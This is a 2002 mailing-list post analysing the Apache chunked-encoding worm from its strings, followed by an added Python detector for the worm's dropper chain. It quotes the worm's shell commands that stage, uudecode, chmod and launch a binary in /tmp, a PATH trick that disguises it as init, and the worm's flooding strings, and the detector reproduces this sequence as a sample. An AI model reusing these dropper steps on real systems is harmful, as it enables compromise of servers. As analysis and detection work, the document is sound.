BA-2002-01 String-Based Analysis of Apache Chunked Encoding Worm

From: Golden_Eternity [[email protected]]
Sent: Friday, June 28, 2002 2:15 PM
Subject: RE: Apache worm in the wild

Just based on the strings in the .a file, this is my best guess as to what it's 
doing. I haven't tried running it, yet, so my observations are very limited. 
Hopefully someone will find this interesting.

Domas Mituzas has already given us an analysis of the web requests on his site 
(http://dammit.lt/apache-worm/) so I won't look at that.

There are a lot of shell commands used instead of function calls. Also, in one 
instance, the worm executes the same command twice in close proximity. This has 
been interpreted by some to suggest that the author was not very skilled. I'll 
reserve judgement on that (especially, since I'm not all that skilled at 
reverse engineering).

--- Begin Observations ---

Old copies of the worm are removed.
The uuencoded worm is written to /tmp/.uua from stdin (until '__eof__'). 

	rm -rf /tmp/.a;
	cat > /tmp/.uua << __eof__;

/tmp/.uua is uudecoded as /tmp/.a 
Worm tries to kill any active copies of itself.
Worm sets .a executable.
Worm tries to kill any active copies of itself (again).
Worm launches .a then exits.

	/usr/bin/uudecode -p /tmp/.uua > /tmp/.a;
	killall -9 .a;
	chmod +x /tmp/.a;
	killall -9 .a;
	/tmp/.a %s;
	exit;

The worm probably logs its attempts to /tmp/.log

Elsewhere in the worm, it appears to attempt to disguise itself(?) as init. I 
couldn't tell where this file was created. Usage appears to match what we've 
seen for the worm elsewhere, but that isn't conclusive. Further analysis is 
needed.

	mv /tmp/tmp /tmp/init;
	export PATH="/tmp";
	init %s

It also appears to announce itself via email. It probably uses 
'[email protected]' as the source for some of these strings.

	HELO %s
	MAIL FROM:<%s>
	RCPT TO:<%s>
	DATA
	QUIT
	Return-Path: <%c%c%c%c%c%c%[email protected]>
	From: %s
	Message-ID: <%x.%x.%[email protected]>
	Date: %s
	Subject: %s
	To: %s
	Mime-Version: 1.0
	Content-Type: text/html

There are some strings that indicate that it is also designed for DoS. Domas 
Mituzas reported that the worm attempts to listen on 2001/udp.

	Cannot packet local networks
	Udp flooding target
	Tcp flooding target
	Sending packets to target
	Dns flooding target

The worm is nice enough to give usage by the way:

	%s <base 1> [base 2] ...

wink ([email protected]) has pointed out that an IP address that appears to be 
hard coded into the worm (12.127.17.71) resolves to dns-rs1.bgtmo.ip.att.net.

--- End Observations ---

All credit to: Domas Mituzas ([email protected]) 
Honorable mention: strings, uudecode, and md5sum.

-G_E
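As an added example (not part of the original message), here is a small detector that flags the dropper sequence quoted above when it shows up in a captured command stream, e.g. shell commands recovered from a request body or a process-audit log. The stage patterns and the sample input are my own, constructed from the strings in the post; the target argument standing in for the worm's %s is a placeholder.

```python
"""Detect the Apache chunked-encoding worm's dropper chain in a command stream.
Added example, not from the original post; sample input is constructed from
the strings quoted in the analysis."""
import re

# Ordered stages of the dropper, reconstructed from the worm's strings:
# stage the uuencoded payload, decode it, make it executable, launch it.
DROPPER_STAGES = [
    ("stage_payload", re.compile(r"cat\s*>\s*/tmp/\.uua\s*<<\s*__eof__")),
    ("decode", re.compile(r"uudecode\s+-p\s+/tmp/\.uua\s*>\s*/tmp/\.a")),
    ("chmod", re.compile(r"chmod\s+\+x\s+/tmp/\.a")),
    # Launch only counts when /tmp/.a is the command itself, not an argument
    # (so the initial 'rm -rf /tmp/.a' and the uudecode redirect don't match).
    ("launch", re.compile(r"(^|;)\s*/tmp/\.a(\s|;|$)")),
]

def scan_command_stream(lines):
    """Return the dropper stage names seen, in order of first appearance."""
    seen = []
    for line in lines:
        for name, pat in DROPPER_STAGES:
            if name not in seen and pat.search(line):
                seen.append(name)
    return seen

def is_dropper(lines):
    """True only if the full chain appears in the expected order."""
    return scan_command_stream(lines) == [name for name, _ in DROPPER_STAGES]

# Constructed sample modelled on the sequence from the analysis; the uuencoded
# body is elided and '10.0.0.1' is a placeholder for the worm's %s argument.
SAMPLE = """rm -rf /tmp/.a;
cat > /tmp/.uua << __eof__;
begin 644 .a
M(uuencoded payload elided)
end
__eof__
/usr/bin/uudecode -p /tmp/.uua > /tmp/.a;
killall -9 .a;
chmod +x /tmp/.a;
killall -9 .a;
/tmp/.a 10.0.0.1;
exit;""".splitlines()

# Constructed benign commands that share individual tokens but not the chain.
BENIGN = ["ls -la /tmp", "cat > /tmp/notes.txt << EOF", "chmod +x /tmp/build.sh"]

if __name__ == "__main__":
    print(scan_command_stream(SAMPLE), is_dropper(SAMPLE))
    print(scan_command_stream(BENIGN), is_dropper(BENIGN))
```

Matching on the whole ordered chain rather than on any single string keeps a lone 'chmod +x' or heredoc from firing the detector.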